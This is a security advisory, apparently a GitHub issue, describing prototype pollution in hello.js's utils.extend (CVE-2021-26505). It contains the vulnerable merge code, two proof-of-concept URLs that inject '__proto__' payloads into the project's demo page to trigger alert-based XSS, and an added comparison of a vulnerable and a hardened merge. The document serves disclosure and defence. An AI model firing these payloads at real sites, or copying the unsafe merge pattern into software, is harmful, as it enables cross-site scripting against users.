CVE-2021-26505: Prototype Pollution in hello.js · Issue #634 · MrSwitch/hello.js

A prototype pollution vulnerability in MrSwitch hello.js version 1.18.6 allows remote attackers to execute arbitrary code via the hello.utils.extend function.

Abstract

The function hello.utils.extend, defined in the file hello.js, introduces a Prototype Pollution vulnerability, which could result in Cross-Site Scripting. The vulnerable function is reproduced below.

    hello.utils = {

        // Extend the first object with the properties and methods of the second
        extend: function(r /*, a[, b[, …]] */) {

            // Get the arguments as an array but omit the initial item
            Array.prototype.slice.call(arguments, 1).forEach(function(a) {

                if (Array.isArray(r) && Array.isArray(a)) {
                    Array.prototype.push.apply(r, a);
                }

                // Recursive merge: every enumerable key of `a`, including "__proto__",
                // is written into `r`, so r["__proto__"] (Object.prototype) is reachable.
                else if (r && (r instanceof Object || typeof r === 'object') && a && (a instanceof Object || typeof a === 'object') && r !== a) {
                    for (var x in a) {
                        r[x] = hello.utils.extend(r[x], a[x]);
                    }
                }

                else {
                    if (Array.isArray(a)) {
                        // Clone it
                        a = a.slice(0);
                    }
                    r = a;
                }
            });

            return r;
        }
    };

The code on Line 29 of hello.js shows the typical pattern of Prototype Pollution: a recursive merge that assigns through every key of the source object, including "__proto__", without checking for own properties or prototype-walking keys.

r[x] = hello.utils.extend(r[x], a[x]);

This vulnerable function is then called on Line 1320 of hello.js with input parsed from the URL query string and fragment, which could allow attackers to pollute Object.prototype for the whole page:

    p = _this.merge(_this.param(location.search || ''), _this.param(location.hash || ''));

Proof of Concepts

As a result, websites that use hello.js are very likely to be exposed to Cross-Site Scripting. Taking the official demo of hello.js as an example, the Prototype Pollution could be exploited as follows:

https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22__proto__%22:{%22callback%22:%22alert%22}}
https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22__proto__%22:{%22onbeforescriptexecute%22:%22alert(location.href)%22}}

Suggestion

  • Freeze the prototype: use Object.freeze(Object.prototype).
  • Require schema validation of JSON input.
  • Avoid using unsafe recursive merge functions.
  • Consider using objects without prototypes (for example, Object.create(null)), which breaks the prototype chain and prevents pollution.
  • As a best practice, use Map instead of Object.
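The following is an added example, not code from the hello.js project: a minimal recursive merge with the same defect as hello.utils.extend placed next to a hardened version that applies the suggestions above (skip prototype-walking keys, copy own properties only). The helper parseStateFragment and the demonstrate function are assumptions that stand in for hello.js's parsing of the URL fragment; the constructed payload uses the same shape as the first PoC URL, and the example verifies, from a defender's point of view, which merge leaves Object.prototype polluted.

```javascript
// Added example, not hello.js project code.

// Simplified version of the vulnerable pattern: recurses into every enumerable
// key of `a`, including "__proto__", so r["__proto__"] (Object.prototype) gets
// written to when the input comes from parsed JSON.
function vulnerableExtend(r, a) {
  if (r && typeof r === 'object' && a && typeof a === 'object' && r !== a) {
    for (var x in a) {
      r[x] = vulnerableExtend(r[x], a[x]);
    }
    return r;
  }
  return a;
}

// Hardened version: copy own enumerable keys only and refuse the keys that
// walk the prototype chain.
var UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeExtend(r, a) {
  if (r && typeof r === 'object' && a && typeof a === 'object' && r !== a) {
    for (var x of Object.keys(a)) {      // own enumerable keys only
      if (UNSAFE_KEYS.has(x)) continue;  // never assign through the prototype chain
      r[x] = safeExtend(r[x], a[x]);
    }
    return r;
  }
  return a;
}

// Hypothetical stand-in for hello.js's handling of "#state=...": the state
// value is URL-decoded JSON taken from the fragment.
function parseStateFragment(hash) {
  var m = /state=([^&]*)/.exec(hash);
  return m ? JSON.parse(decodeURIComponent(m[1])) : {};
}

// Constructed input with the same shape as the advisory's first PoC URL.
var CONSTRUCTED_HASH =
  '#state=' + encodeURIComponent('{"a":"1","__proto__":{"callback":"alert"}}');

// Runs one merge implementation over the constructed input and reports whether
// an unrelated object observes the injected property via Object.prototype.
function demonstrate(mergeFn) {
  var victim = {};  // unrelated object that must not be affected by the merge
  var target = mergeFn({}, parseStateFragment(CONSTRUCTED_HASH));
  var polluted = Object.prototype.hasOwnProperty.call(Object.prototype, 'callback');
  var leaked = victim.callback;
  delete Object.prototype.callback;  // clean up so the rest of the process is unaffected
  return { a: target.a, polluted: polluted, leaked: leaked };
}

console.log('vulnerable:', demonstrate(vulnerableExtend));
console.log('hardened:  ', demonstrate(safeExtend));
```

Note that JSON.parse creates "__proto__" as an own data property of the parsed object, which is why both for...in and Object.keys see it; the hardened version is safe because it skips the key rather than because the property is hidden. Adding Object.freeze(Object.prototype) at startup is a complementary control: the assignment in vulnerableExtend then becomes a silent no-op in sloppy mode and a TypeError in strict mode.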

Related news

GHSA-g3vf-47fv-8f3c: MrSwitch hello.js vulnerable to prototype pollution

A prototype pollution vulnerability in MrSwitch hello.js prior to version 1.18.8 allows remote attackers to execute arbitrary code via `hello.utils.extend` function.
